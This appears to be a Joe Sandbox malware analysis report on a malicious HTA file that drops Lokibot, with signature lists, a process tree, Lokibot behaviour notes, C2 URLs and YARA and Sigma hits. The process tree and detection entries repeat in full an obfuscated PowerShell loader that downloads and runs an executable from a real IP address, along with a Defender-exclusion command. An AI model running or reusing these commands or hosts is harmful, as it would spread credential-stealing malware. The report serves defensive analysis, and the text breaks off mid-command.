Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
goodtoseeuthatgreatthingswithentirethingsgreatfor.hta

Overview

General Information

Sample name:goodtoseeuthatgreatthingswithentirethingsgreatfor.hta
Analysis ID:1559253
MD5:ec0d423a3f72d69975a1e31a275f5377
SHA1:213922fb8456ecaadc24889afec1ac6ef5010c68
SHA256:9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Drops PE files with benign system names
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6360 cmdline: mshta.exe "C:\Users\user\Desktop\goodtoseeuthatgreatthingswithentirethingsgreatfor.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 6668 cmdline: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 3604 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 5040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF21.tmp" "c:\Users\user\AppData\Local\Temp\sg2bcrbf\CSC9DC7DEFBB3DB4CF88431EEB79FD9B6EB.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wininit.exe (PID: 4416 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)
        • powershell.exe (PID: 4364 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • conhost.exe (PID: 3196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WmiPrvSE.exe (PID: 3488 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • wininit.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)
  • svchost.exe (PID: 7108 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x175f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000006.00000002.1797561748.0000000003709000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x49bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          6.2.wininit.exe.3709200.2.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            6.2.wininit.exe.3709200.2.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            6.2.wininit.exe.3709200.2.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            6.2.wininit.exe.3709200.2.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            6.2.wininit.exe.3709200.2.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 37 entries

            System Summary

            barindex
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6668, TargetFilename: C:\Users\user\AppData\Roaming\wininit.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 4416, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 4364, ProcessName: powershell.exe
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", CommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgI
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, ProcessId: 7068, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wininit.exe, NewProcessName: C:\Users\user\AppData\Roaming\wininit.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wininit.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6668, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 4416, ProcessName: wininit.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sg2bcrbf\sg2bcrbf.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6L